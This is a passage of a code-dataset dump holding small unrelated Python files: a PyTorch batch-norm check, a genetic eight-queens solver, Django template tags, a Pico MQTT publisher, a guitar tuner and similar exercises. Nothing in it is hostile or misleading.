BN_layer.running_var.data =BN_layer.running_var.data.to(torch.float64)\r\n BN_fm_out= BN_layer.forward(BN_fm_in)\r\n\r\n for i in range(0,BN_layer.running_mean.data.shape[0]):\r\n print('batch_mean: {:.10} batch var: {:.20f}'.format(BN_layer.running_mean.data[i], BN_layer.running_var.data[i]))\r\n#torch2numpy\r\n fm_in_np = BN_fm_in.detach().numpy()\r\n fm_out_np = BN_fm_out.detach().numpy()\r\n\r\n mean_0 = 
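The conv/pool shape parameters above can be checked numerically. PyTorch documents the spatial-size rule for `Conv2d`/`MaxPool2d` shown below (note that `AvgPool2d` accepts no `dilation` argument, so the `pool_mode = "AVG"` combination with `pool_dilation_info` would need `MaxPool2d`-style settings); a quick sketch applying it to the pool parameters in the script:

```python
import math

def out_size(n_in, kernel, stride, dilation, padding):
    # PyTorch Conv2d/MaxPool2d spatial-size rule:
    # floor((n_in + 2*padding - dilation*(kernel - 1) - 1) / stride + 1)
    return math.floor((n_in + 2 * padding - dilation * (kernel - 1) - 1) / stride + 1)

# Pool settings from the script: 256x256 input, kernel 2, stride 7,
# dilation 3, padding 1  ->  37x37 output.
print(out_size(256, kernel=2, stride=7, dilation=3, padding=1))
```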
BN_layer.running_mean.data[0]\r\n var_0 = BN_layer.running_var.data[0]\r\n fm_out_0000=(fm_in_np[0,0,0,0]-mean_0)/(np.sqrt(var_0)+eps)*gamma+beta\r\n print('fm_out0000 var: {:.20f}'.format(fm_out_0000))\r\n#文件保存\r\n dir = 'inout'\r\n if not os.path.exists(dir):\r\n os.mkdir(dir)\r\n\r\n np.savetxt(dir + '/BN_fm_in.txt' , BN_fm_in.reshape(-1, 1))\r\n np.savetxt(dir + '/BN_fm_out.txt', BN_fm_out.reshape(-1, 1))\r\n\r\n print(\"==================================================\")\r\n print(\"=the BN process done DB have saved in the file=\")\r\n print(\"==================================================\")\r\n","repo_name":"richkoala/cnn-operator","sub_path":"cnn-code/pytorch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25237420245","text":"\"\"\"\n Simple function to calculate whether it is a leap year or not.\n\"\"\"\n\n\ndef is_leap_year(year=None):\n \"\"\"\n Simple function to calculate whether it is a leap year or not.\n\n A leap year in the Gregorian calendar occurs:\n - on every year that is evenly divisible by 4\n - except every year that is evenly divisible by 100\n - unless the year is also evenly divisible by 400\n \"\"\"\n if year is None or not isinstance(year, int):\n return 0\n\n leap_year = False\n if year % 4 == 0:\n leap_year = True\n if year % 100 == 0:\n leap_year = False\n if year % 400 == 0:\n leap_year = True\n\n return leap_year\n","repo_name":"martsa1/exersism-exercises","sub_path":"python/leap/leap.py","file_name":"leap.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22358883452","text":"from random import shuffle\nimport random\nimport sys\nimport operator\nimport time\n\nclass Cromossomo:\n\n\tdef __init__(self, tam):\n\t\tself._data = list(range(tam))\n\t\tself._taxaMutacao = random.random()\n\t\tshuffle(self._data)\n\n\tdef getGene(self, idx):\n\t\treturn self._data[idx]\n\n\tdef setData(self, data):\n\t\tself._data = data\n\n\tdef setTaxaMutacao(self, taxaMutacao):\n\t\tself._taxaMutacao = taxaMutacao\n\n\tdef setGene(self, idx, valor):\n\t\tself._data[idx] = valor\n\n\tdef getData(self):\n\t\treturn self._data\n\n\tdef __getitem__(self, idx):\n\t\treturn self._data[idx]\n\n\tdef size(self):\n\t\treturn len(self._data)\n\n\tdef __repr__(self):\n\t\treturn str(self._data)\n\n\tdef _boundsOK(self, i, j):\n\t\tif (i < self.size() and i >= 0 and j < self.size() and j >= 0):\n\t\t\treturn True\n\t\treturn False\n\n\n\t# numero de colisoes\n\tdef getAvaliacao(self):\n\t\tcolisoes = 0\n\n\t\tfor i in range(self.size()):\n\t\t\t# diagonal principal superior\n\t\t\tfor l in range(self.size()):\n\t\t\t\t# Diag Sup or Diag Inf or Diga Inv Sup or Diag Inv Inf\n\t\t\t\tif ( ( self._boundsOK( i - (l + 1), self._data[i] + (l + 1) ) and self._data[i - (l + 1)] == self._data[i] + (l + 1) ) or\n\t\t\t\t( self._boundsOK( i + (l + 1), self._data[i] - (l + 1) ) and self._data[i + (l + 1)] == self._data[i] - (l + 1) ) or\n\t\t\t\t( self._boundsOK( i - (l + 1), self._data[i] - (l + 1) ) and self._data[i - (l + 1)] == self._data[i] - (l + 1) ) or\n\t\t\t\t( self._boundsOK( i + (l + 1), self._data[i] + (l + 1) ) and self._data[i + (l + 1)] == self._data[i] + (l + 1) ) ):\n\t\t\t\t\tcolisoes+= 1\n\t\treturn colisoes\n\n\tdef cruzamento(self, outro):\n\t\t# olhar funcao de cruzamento do PCV-PQ\n\n\t\tpontoFlutuante = random.randint(1, self.size() 
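One caveat about the manual check above: `fm_out_0000` divides by `np.sqrt(var_0)+eps`, while the canonical batch-norm formula puts `eps` inside the root, `(x - mean) / sqrt(var + eps)`; the two are indistinguishable here only because `eps = 0`. A reference sketch of the standard form:

```python
import numpy as np

def batchnorm_reference(x, mean, var, gamma=1.0, beta=0.0, eps=1e-5):
    # Canonical batch-norm: eps sits inside the square root,
    # i.e. (x - mean) / sqrt(var + eps), not sqrt(var) + eps.
    return (x - mean) / np.sqrt(var + eps) * gamma + beta

x = np.random.randn(8, 3, 4, 4)
mean = x.mean(axis=(0, 2, 3), keepdims=True)
var = x.var(axis=(0, 2, 3), keepdims=True)
y = batchnorm_reference(x, mean, var)
print(y.mean(), y.std())  # close to 0 and 1 after normalization
```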
- 1)\n\n\t\tf1 = self._data[0:pontoFlutuante]\n\t\tf2 = outro[0:pontoFlutuante]\n\n\t\tverif1 = [0] * self.size()\n\t\tverif2 = [0] * self.size()\n\n\t\tfor i in range(pontoFlutuante):\n\t\t\tverif1[f1[i]] = 1\n\t\t\tverif2[f2[i]] = 1\n\n\t\tfor i in range(self.size()):\n\t\t\t# if outro[i] not in f1:\n\t\t\t# \tf1.append(outro[i])\n\t\t\t# if self._data[i] not in f2:\n\t\t\t# \tf2.append(self._data[i])\n\t\t\tif verif1[outro[i]] == 0:\n\t\t\t\tf1.append(outro[i])\n\t\t\tif verif2[self._data[i]] == 0:\n\t\t\t\tf2.append(self._data[i])\n\n\t\tx = Cromossomo(self.size())\n\t\tx.setData(f1)\n\t\tx.setTaxaMutacao(random.random())\n\n\t\ty = Cromossomo(self.size())\n\t\ty.setData(f2)\n\t\ty.setTaxaMutacao(random.random())\n\n\t\treturn [x, y]\n\n\tdef mutacao(self, taxaMutacao):\n\t\tif taxaMutacao <= self._taxaMutacao:\n\t\t\tidx1 = random.randint(0, self.size() - 1)\n\t\t\tidx2 = random.randint(0, self.size() - 1)\n\n\t\t\taux = self._data[idx1]\n\t\t\tself._data[idx1] = self._data[idx2]\n\t\t\tself._data[idx2] = aux\n\nclass Genetico:\n\n\t# popSize - tamanho da populacao\n\t# txMutacao - taxa de mutacao (0 a 1)\n\t# porcentCruzamento - procentagem da populacao para fazer cruzamento (0 a 100)\n\t# geracoes - numero de geracoes\n\n\tdef __init__(self, popSize, txMutacao, porcentCruzamento, geracoes, tamanhoTabuleiro):\n\t\t#parametros\n\t\tself._populacao = []\n\t\tself._popSize = popSize\n\t\tself._txMutacao = txMutacao\n\t\tself._geracoes = 0\n\t\tself._cruzamentos = int ( (porcentCruzamento/100.0) * self._popSize ) // 2\n\t\tself._tamanhoTabuleiro = tamanhoTabuleiro\n\n\tdef run(self):\n\n\t\tself.gerarPopulacaoInicial()\n\t\tself._populacao.sort(key=operator.methodcaller(\"getAvaliacao\"), reverse=False)\n\n\t\twhile self._geracoes < geracoes :\n\t\t\t#print \"POP da iteracao: \", self._geracoes\n\t\t\t#print self.printPop()\n\t\t\tself._geracoes+= 1\n\t\t\t# print (self.aptdMedia())\n\t\t\t# print 'geracao ', self._geracoes\n\t\t\tfor i in range(self._cruzamentos/2):\n\n\t\t\t\t# indA = self.roleta()\n\t\t\t\t# indB = self.roleta()\n\t\t\t\tindA = self._populacao[i]\n\t\t\t\tindB = self._populacao[i + 1]\n\n\t\t\t\t#Reproducao\n\t\t\t\tfilhos = indA.cruzamento(indB)\n\t\t\t\tfilhos[0].mutacao(self._txMutacao)\n\t\t\t\tfilhos[1].mutacao(self._txMutacao)\n\n\t\t\t\tself._populacao.append(filhos[0])\n\t\t\t\tself._populacao.append(filhos[1])\n\n\t\t\tself.selecao()\n\t\t\tif self._populacao[0].getAvaliacao() == 0:\n\t\t\t\tbreak\n\t\t\t#print \"aqui2\"\n\n\t\t#return self.getSolucaoDeElite()\n\t\t#print self.printPop()\n\t\treturn self._populacao[0]\n\n\tdef getPopulacao(self):\n\t\treturn self._populacao\n\n\tdef gerarPopulacaoInicial(self):\n\t\tfor i in range(0, self._popSize + 1):\n\t\t\tself._populacao.append(Cromossomo(self._tamanhoTabuleiro))\n\n\tdef roleta(self):\n\t\t# x = soteira num 0 - soma\n\t\t# subtrai dos x os valores dos individuos ate que x assuma um valor <=0, there is the guy\n\t\tsoma = 0.0\n\t\tfor i in range(len(self._populacao)):\n\t\t\tif self._populacao[i].getAvaliacao() > 0:\n\t\t\t\tsoma+= 1.0/self._populacao[i].getAvaliacao()\n\t\t\telse:\n\t\t\t\tsoma+= 1;\n\t\tx = random.random() * soma\n\n\t\ti = 0\n\t\twhile x >= 0 and i < len(self._populacao):\n\t\t\tif self._populacao[i].getAvaliacao() > 0:\n\t\t\t\tx-= 1.0/self._populacao[i].getAvaliacao()\n\t\t\telse:\n\t\t\t\tx-= 1.0\n\t\t\ti+= 1\n\t\treturn self._populacao[i - 1]\n\n\n\tdef elite(self):\n\t\t#print \"Pop anterior: \"\n\t\t#print 
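`cruzamento` above is a one-point permutation crossover: each child keeps a prefix of one parent and fills the remainder in the other parent's order, with the `verif` bitmaps replacing the commented-out `in`-membership tests for O(1) lookups. A standalone sketch of the same idea (hypothetical names, genes assumed to be 0..n-1 as in the board encoding):

```python
import random

def one_point_permutation_crossover(p1, p2):
    # Child keeps a prefix of p1, then appends p2's genes in order,
    # skipping any already present -- the result stays a permutation.
    cut = random.randint(1, len(p1) - 1)
    child = p1[:cut]
    seen = [False] * len(p1)
    for g in child:
        seen[g] = True
    for g in p2:
        if not seen[g]:
            child.append(g)
            seen[g] = True
    return child

a = [0, 1, 2, 3, 4, 5, 6, 7]
b = [7, 6, 5, 4, 3, 2, 1, 0]
print(one_point_permutation_crossover(a, b))
```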
self.printPop()\n\t\tself._populacao.sort(key=operator.methodcaller(\"getAvaliacao\"), reverse=False)\n\t\tself._populacao = self._populacao[0:self._popSize + 1]\n\t\t#print \"Pop pos:\"\n\t\t#print self.printPop()\n\t\treturn self._populacao\n\n\tdef getSolucaoDeElite(self):\n\t\tbestSol = sys.maxint\n\t\tfor i in range(len(self._populacao)):\n\t\t\t# print self._populacao[i] , \" -- \", self._populacao[i].getAvaliacao()\n\t\t\tif self._populacao[i].getAvaliacao() < bestSol:\n\t\t\t\tbestSol = self._populacao[i]\n\n\t\treturn bestSol\n\n\n\tdef selecao(self):\n\t\topt = 1\n\t\tif opt == 0:\n\t\t\tnewPop = []\n\t\t\twhile len(newPop) != self._popSize:\n\t\t\t\tnewPop.append(self.roleta())\n\t\t\tself._populacao = newPop\n\t\telse:\n\t\t\treturn self.elite()\n\n\tdef printPop(self):\n\t\tstring = ''\n\t\tfor i in range(0, len(self._populacao)):\n\t\t\tstring+= str(i) + '-' + str(self._populacao[i]) + ' - ' + str(self._populacao[i].getAvaliacao()) + '\\n'\n\t\treturn string\n\n\tdef aptdMedia(self):\n\t\tmd = 0;\n\t\tfor i in range(0, len(self._populacao)):\n\t\t\tmd+= self._populacao[i].getAvaliacao()\n\t\t#print \"soma:\", md\n\t\t#print \"len:\", len(self._populacao)\n\t\tmd/=(len(self._populacao) * 1.0)\n\t\t#print \"media: \", md\n\t\treturn md\n\n# popSize - tamanho da populacao\n# txMutacao - taxa de mutacao (0 a 1)\n# porcentCruzamento - procentagem da populacao para fazer cruzamento (0 a 100)\n# geracoes - numero de geracoes\n\n# pyhton genetico8rainhas.py 200 0.5 50 500\n# print sys.argv\npopSize = int(sys.argv[1])\ntxMutacao = float(sys.argv[2])\nporcentCruzamento = int(sys.argv[3])\ngeracoes = int(sys.argv[4])\ntamanhoTabuleiro = 8\n\n#popSize = 200\n#txMutacao = 0.5\n#porcentCruzamento = 50\n#geracoes = 500\n#tamanhoTabuleiro = 8\nmelhor_tempo = sys.float_info.max\npior_tempo = sys.float_info.min\ntempo_medio = 0.0\nnum_sol_val = 0\nmediaAptdMedia = 0.0\nRODADAS = 10\nmelhorApt = sys.float_info.max\n\nfor i in range(0, RODADAS):\n\t#start_time = time.time()\n\tg = Genetico(popSize, txMutacao, porcentCruzamento, geracoes, tamanhoTabuleiro)\n\tsol = g.run()\n\t#print g.aptdMedia()\n\tmediaAptdMedia+= g.aptdMedia()\n\t#time_atual = (time.time() - start_time)\n\t#tempo_medio+= time_atual\n\t#if time_atual < melhor_tempo:\n\t#\tmelhor_tempo = time_atual\n\t#if time_atual > pior_tempo:\n\t#\tpior_tempo = time_atual\n\t#if sol.getAvaliacao() == 0:\n\t#\tnum_sol_val+= 1\n\t#if g.aptdMedia() < melhorApt:\n\t#\tmelhorApt = g.aptdMedia()\n\n\n#tempo_medio/=RODADAS\nmediaAptdMedia/=RODADAS\n#print(\"%.3f, %.3f, %.3f, %.3f, %.3f, %i\" %(melhor_tempo, pior_tempo, tempo_medio, mediaAptdMedia, melhorApt, num_sol_val))\nprint (\"%.3f\" % mediaAptdMedia)\n#print melhor_tempo, \", \", pior_tempo, \", \", tempo_medio, \", \", num_sol_val\n#print (\"%.3f\" % total_time)\n\n#print(\"%s\" % (time.time() - start_time))\n\n#print sol, sol.getAvaliacao()\n","repo_name":"jeansantana/desafio8Rainhas","sub_path":"genetico8rainhas.py","file_name":"genetico8rainhas.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74476157640","text":"#!/usr/bin/env python3\nimport sys, os\nimport numpy as np\nfrom math import *\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as cls\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\n\ngdata = np.loadtxt('../grids/WHL_M2_mu.grid')\n\ninput_dir = '../slha_files/WHL_M2_mu'\n#input_dir = '../decay_out/MSSM/WHL_M2_mu'\n\nmWino = 
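`roleta` above implements roulette-wheel selection for a minimization problem by weighting each individual with the inverse of its collision count (and weight 1 for a perfect score of 0). A compact sketch of that scheme in isolation:

```python
import random

def roulette_min(population, fitness):
    # Minimization roulette: weight each individual by the inverse of its
    # fitness (collision count), treating a perfect score of 0 as weight 1.
    weights = [1.0 / f if f > 0 else 1.0 for f in map(fitness, population)]
    pick = random.random() * sum(weights)
    for individual, w in zip(population, weights):
        pick -= w
        if pick <= 0:
            return individual
    return population[-1]  # guard against floating-point drift

print(roulette_min([3, 1, 0, 8], fitness=lambda v: v))
```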
398\n\nmu_ar, mN1_ar, mN2_ar, mC1_ar = [], [], [], []\nfor g in gdata:\n    x, y = int(g[0]), int(g[1])\n\n    if x != mWino: continue \n\n    mN1, mC1 = -1, -1\n    tag_N1, tag_C1 = '--'*10, '**'*10\n    for line in open('{}/WHL_M2_mu_{}_{}.spec'.format(input_dir, x, y)):\n        elems = line.split()\n        if len(elems) < 3: continue\n        if elems[0] == '1000022': \n            mN1 = float(elems[1])\n            tag_N1 = elems[3]\n        if elems[0] == '1000023': \n            mN2 = abs(float(elems[1]))\n            tag_N1 = elems[3]\n        if elems[0] == '1000024': \n            mC1 = float(elems[1])\n            tag_C1 = elems[3]\n            break \n    #print(mN1, mN2, mC1, tag_N1, tag_C1)\n    #mdif = (mC1 - mN1)*1000\n    mu_ar.append(y)\n    mN1_ar.append(mN1)\n    mN2_ar.append(mN2)\n    mC1_ar.append(mC1)\n\nmu_ar = np.array(mu_ar)\nmN1_ar = np.array(mN1_ar)\nmN2_ar = np.array(mN2_ar)\nmC1_ar = np.array(mC1_ar)\n\n##################################################\n#fig = plt.figure(figsize=(8,5))\n#ax = fig.add_subplot(111) \n#fig.subplots_adjust(bottom=0.15, right=0.8, top=0.94, left=0.2)\n\nfig = plt.figure()\nax = fig.add_subplot(111) \nfig.subplots_adjust(bottom=0.15, right=0.8, top=0.94, left=0.2)\nax.xaxis.set_ticks_position('both')\nax.yaxis.set_ticks_position('both')\n\n\nfs = 18\n\n# cm = plt.cm.get_cmap('RdYlBu')\n# #sc = ax.scatter(xar, yar, c=zar, norm=cls.LogNorm(), cmap=cm)\n# sc = ax.scatter(xar, yar, c=zar, vmin=80, vmax=1000, cmap=cm)\n#fig.colorbar(sc, label='$\\Delta m$ [MeV]')\n\n#ax.plot(mu_ar, mN1_ar, c='r') \nlw = 2\n#ax.plot(mu_ar, mN2_ar - mN1_ar, c='r', ls='-.', lw=lw, label=r'$m_{N2} - m_{N1}$') \n#ax.plot(mu_ar, mC1_ar - mN1_ar, c='b', ls='-.', lw=lw, label=r'$m_{C1} - m_{N1}$') \np1=ax.plot(mu_ar, mN2_ar - mN1_ar, c='r', label=r'$m_{N2} - m_{N1}$') \np2=ax.plot(mu_ar, mC1_ar - mN1_ar, c='b', label=r'$m_{C1} - m_{N1}$') \n\nax.set_xlim([200, 1000])\n#ax.set_ylim([200, 600])\n\n#ax.set_xscale('log')\nax.set_yscale('log')\n\nax.set_xlabel(r'$\\mu$ [GeV]', fontsize=fs)\nax.set_ylabel(r'$\\Delta m$ [GeV]', fontsize=fs) \n\nax.legend(loc='upper left', fontsize=13)\n\n#ax.set_title('$\\Delta m$ [MeV] (GM2CALC)', fontsize=fs)\n#pdfname = 'delM_GM2C.pdf'\n\nax.set_title(r'$M_2 = 398\\,{\\rm GeV}$', fontsize=16)\npdfname = 'mEWK.pdf'\n\n\nfig.savefig(pdfname, bbox_inches = 'tight', pad_inches = 0.1)\nprint(pdfname)\n","repo_name":"kazuki-sakurai/g-2EWKplots","sub_path":"disappearing/plot_mEWK.py","file_name":"plot_mEWK.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"16701009218","text":"from django import template\n\nregister = template.Library()\n\n\n@register.tag(name=\"wishlists_containing_product\")\ndef do_basket_form(parse, token):\n    \"\"\"\n    Template tag for adding the user's wishlists form to the\n    template context so it can be rendered.\n    \"\"\"\n    tokens = token.split_contents()\n    if len(tokens) != 5:\n        raise template.TemplateSyntaxError(\n            \"%r tag uses the following syntax: \"\n            \"{%% wishlists_containing_product wishlists product as \"\n            \"ctx_var %%}\" % tokens[0])\n\n    wishlists_var, product_var, name_var = tokens[1], tokens[2], tokens[4]\n    return ProductWishlistsNode(\n        wishlists_var, product_var, name_var)\n\n\nclass ProductWishlistsNode(template.Node):\n    def __init__(self, wishlists_var, product_var, name_var):\n        self.wishlists_var = template.Variable(wishlists_var)\n        self.product_var = template.Variable(product_var)\n        self.name_var = name_var\n\n    def render(self, context):\n        try:\n            wishlists = self.wishlists_var.resolve(context)\n            
product = self.product_var.resolve(context)\n        except template.VariableDoesNotExist:\n            return ''\n        context[self.name_var] = wishlists.filter(\n            lines__product=product)\n        return ''\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/17130_wishlist_tags.py","file_name":"17130_wishlist_tags.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"}
{"seq_id":"35904168634","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'subscription', views.SubscriptionViewSet, basename='subscription')\n\n\nurlpatterns = [\n    path('api/alternative/', include(router.urls)),\n    path('api/subscription/', views.SubscriptionsListAddViews.as_view(), name='subscriptions'),\n    path('api/subscription/<int:pk>/', views.SubscriptionsDellViews.as_view(), name='delete_subscription'),\n    path('api/report/<int:pk>/', views.ProductReport.as_view(), name='product_report'),\n]\n","repo_name":"velPavelTest/fullstatsApi","sub_path":"wildwatch/watch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"36987711550","text":"import sys\nimport os\n\nfile_dir = sys.argv[-1]\n\nfile_list = os.listdir(file_dir)\nold_format = raw_input(\"Enter the format you want to change: \")\nnew_format = raw_input(\"Enter the new format: \")\nconverted = 0\nfor names in file_list:\n    splitted = names.split('.')\n    if splitted[-1] == old_format:\n        splitted.remove(old_format)\n        splitted.append(new_format)\n        new_name = '.'.join(splitted)\n        old_name = os.path.join(file_dir, names)\n        newest = os.path.join(file_dir, new_name)\n        os.rename(old_name, newest)\n        converted += 1\nprint('%s files converted from %s to %s' %(converted, old_format, new_format))\n\n# total = len(sys.argv)\n# cmdargs = str(sys.argv)\n# print(\"The total number of system arguments is %d\" %total)\n# print(\"Args list: %s\" % cmdargs)\n","repo_name":"Favouroked/FormatChange","sub_path":"formatchange.py","file_name":"formatchange.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"39078761373","text":"'''\n\nWrite a program to return the difference between the largest and smallest number from an array of positive integers.\n\ninput1: 5\ninput2: 10 11 7 12 14\n\nOutput:\n--------\n\n7\n\n'''\n\ndef findLargeSmallDifference(input1):\n    input2 = []\n    difference = 0 \n    input2 = list(map(int, input(\"enter the elements separated by spaces: \").strip().split(\" \")))[:input1]\n    for i in range(len(input2)-1):\n        for j in range(len(input2)-1):\n            if input2[j] > input2[j+1]:\n                input2[j], input2[j+1] = input2[j+1], input2[j]\n    # compute after the sort finishes; setting it inside the loop's else\n    # branch misses inputs whose final pass still swaps (e.g. [2, 1])\n    difference = input2[len(input2)-1] - input2[0]\n    print(difference)\n    \ninput1 = int(input(\"Enter the number of elements: \"))\nfindLargeSmallDifference(input1)","repo_name":"Subharanjan-Sahoo/Practice-Questions","sub_path":"Tech Mahindra/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"70795172680","text":"# Raspberry Pi Pico - MQTT Client PubSub\r\n# File: buch2-rpi-picoW-kap7-mqtt-topic-pub.py\r\n\r\n# Libraries\r\nimport time\r\nimport network\r\nfrom umqttsimple import MQTTClient\r\nimport 
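`findLargeSmallDifference` above sorts the whole list to read off the extremes; the same answer falls out of `max`/`min` in a single O(n) pass instead of the O(n²) bubble sort. A hedged alternative (same computation, not a drop-in for the original's I/O):

```python
def find_large_small_difference(values):
    # The largest-minus-smallest difference needs no sort at all.
    return max(values) - min(values)

print(find_large_small_difference([10, 11, 7, 12, 14]))  # 7
```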
urequests\r\n\r\n#WLAN\r\nwlan = network.WLAN(network.STA_IF)\r\nwlan.active(True)\r\nwlan.connect('MeinWLAN','MeinPasswort')\r\n\r\n\r\n# MQTT configuration\r\nmqtt_server = '192.168.1.42'\r\nclient_id = 'pico'\r\ntopic_pub = \"RPIPico\"\r\ntopic_msg = \"Hello Pico...\"\r\n\r\n# Functions\r\ndef mqtt_connect():\r\n    client = MQTTClient(client_id, mqtt_server, keepalive=60)\r\n    client.connect()\r\n    print('Connected to MQTT broker %s'%(mqtt_server))\r\n    return client\r\n\r\ndef callback(topic, msg):\r\n    # topic arrives as bytes; decoding is enough (lstrip(topic) would raise TypeError)\r\n    t = topic.decode(\"utf-8\")\r\n    print(t) \r\n\r\ndef reconnect():\r\n    print('Could not connect to MQTT broker. Retrying...')\r\n    time.sleep(5)\r\n\r\n#MQTT Loop\r\ntry:\r\n    client = mqtt_connect()\r\nexcept OSError as e:\r\n    reconnect()\r\nwhile True:\r\n    client = mqtt_connect()\r\n    client.publish(topic_pub, topic_msg)\r\n    client.set_callback(callback)\r\n    time.sleep(3)\r\n    client.disconnect()","repo_name":"arduinopraxis/Buch-RPi-Pico-2","sub_path":"buch2-rpi-picoW-kap7-mqtt-topic-pub.py","file_name":"buch2-rpi-picoW-kap7-mqtt-topic-pub.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"17561273833","text":"from __future__ import print_function\nimport pyaudio, aubio, wave\nimport sys, time, getopt\nimport numpy as num\nimport math\nimport utility\n\nclass Tuner:\n    __A4 = 440\n    __C0 = 0\n    __base_octave = {}\n    __data_stream = None\n    __pitch_detector = None\n    __tolerance = 0\n    __accuracy = 0\n\n    def __init__(self, A4=440, tolerance = 0.1, accuracy = 5):\n        self.__data_stream = utility.initStream()\n        self.__pitch_detector = utility.initDetector()\n        self.__A4 = A4\n        self.__tolerance = tolerance\n        self.__accuracy = accuracy\n        self.calculateC0()\n        self.initBaseOctave()\n\n    def calculateC0(self):\n        self.__C0 = self.__A4 * pow(2, -4.75)\n\n    def initBaseOctave(self):\n        temp = self.__C0\n        for x in utility.name:\n            self.__base_octave[x] = temp\n            temp = temp * pow(2, 1.0/12) \n\n    def setA4(self, A4):\n        self.__A4 = A4\n        self.calculateC0()\n        self.initBaseOctave()\n\n    def getA4(self):\n        return self.__A4\n\n    def getData(self):\n        data = self.__data_stream.read(1024)\n        samples = num.frombuffer(data, dtype=aubio.float_type)\n        pitch = self.__pitch_detector(samples)[0]\n\n        errorper = 0\n        error= 0\n        note = 0\n        octave = 0\n        \n        if pitch != 0: \n            note,octave = utility.findnote(pitch, self.__C0)\n            \n            expected = self.__base_octave[note] * pow(2, octave)\n            error = pitch - expected\n            \n            if error > 0:\n                margin = expected * (pow(2,1.0/24) - 1)\n            else:\n                margin = expected * (1 - pow(2,-1.0/24))\n            \n            errorper = abs(error) / margin\n\n        return errorper, error, pitch, note, octave\n\n\n    def run(self):\n        tolerance = self.__tolerance\n        accuracy = self.__accuracy\n        while True:\n            errorper, error, pitch, note, octave = self.getData()\n            \n            if pitch!= 0: \n                output = \"Pitch:\" + str(pitch) + \"Hz Note:\" + note + str(octave) + \" \"\n                \n                if errorper > 1:\n                    print(\"Error greater than 100% at pitch : \" + str(pitch))\n                    exit()\n                if errorper <= tolerance:\n                    print (accuracy * \" .\" + utility.colorize(\" ^ \", errorper, tolerance) + accuracy * \". \" + output + '\\r',end = '')\n                else:\n                    if error > 0:\n                        pre = accuracy * \" .\" + \" \"\n                        pos = int(math.ceil(accuracy*errorper))\n                        post = (pos - 1) * \" .\" + utility.colorize(\" <\", errorper, tolerance) + (accuracy - pos) * \" .\"\n                    else:\n                        post = accuracy * \" .\"\n                        pos = accuracy - int(math.ceil(accuracy*errorper)) + 1\n                        pre = \" \" + (pos - 1) * \". 
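The Pico script above only publishes; the matching subscriber side uses the same `umqttsimple` API it imports (`set_callback`, `subscribe`, `check_msg`). A sketch, assuming the broker address and topic from the publisher:

```python
# Subscriber counterpart, assuming the same umqttsimple module
# (a copy of MicroPython's umqtt.simple) used above.
import time
from umqttsimple import MQTTClient

def on_message(topic, msg):
    print(topic.decode("utf-8"), msg.decode("utf-8"))

client = MQTTClient("pico-sub", "192.168.1.42", keepalive=60)
client.set_callback(on_message)
client.connect()
client.subscribe(b"RPIPico")
while True:
    client.check_msg()   # non-blocking poll for pending messages
    time.sleep(1)
```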
\" + utility.colorize(\"> \", errorper, tolerance) + (accuracy - pos) * \". \"\n \n print (pre + \"|\" + post + \" \" + output + '\\r', end = '')\n sys.stdout.flush()\n","repo_name":"iliastsa/py-chromatic-tuner","sub_path":"src/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5026616429","text":"# time = 32 min\ndef open_file():\n fin = open('factory.in')\n belts = []\n count = 1\n for line in fin:\n line = line.strip()\n if count == 1:\n n = int(line)\n else:\n belts.append(map(lambda x: int(x), line.split(\" \")))\n count += 1\n fin.close()\n return n, belts\n\n\ndef check_if_leads(goal, in_out_list, n):\n if n == goal:\n return True\n else:\n try:\n for i in in_out_list:\n if i[0] == n:\n x = i[1]\n break\n check_if_leads(goal, in_out_list, x)\n except:\n return False\n\n\ndef find_answer(stage):\n n = stage[0]\n belts = stage[1]\n answer = -1\n changes = 0\n works = True\n for i in range(n):\n for target in belts:\n if i+1 != target[0]:\n pass\n else:\n works = False\n break\n if works:\n answer = i+1\n changes += 1\n works = True\n if changes >= 2:\n return -1\n return answer\n# answer = i+1\n# for target in range(n-1):\n# if i == target:\n# pass\n# else:\n# if not check_if_leads(i+1, belts, target+1):\n# pass\n# else:\n# answer = -1\n# works = False\n# break\n# if works:\n# return answer\n\n\ndef close_file(answer):\n fout = open(\"factory.out\", \"w\")\n fout.write(\"{}\".format(answer))\n fout.close()\n\n\nclose_file(find_answer(open_file()))\n","repo_name":"DaChosens1/usaco","sub_path":"2019/March/milkfactory_march_19_bronze/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16683459658","text":"\"\"\"Tests for certbot_dns_google.dns_google.\"\"\"\n\nimport os\nimport unittest\n\nimport mock\nfrom googleapiclient.errors import Error\nfrom httplib2 import ServerNotFoundError\n\nfrom certbot import errors\nfrom certbot.errors import PluginError\nfrom certbot.plugins import dns_test_common\nfrom certbot.plugins.dns_test_common import DOMAIN\nfrom certbot.tests import util as test_util\n\nACCOUNT_JSON_PATH = 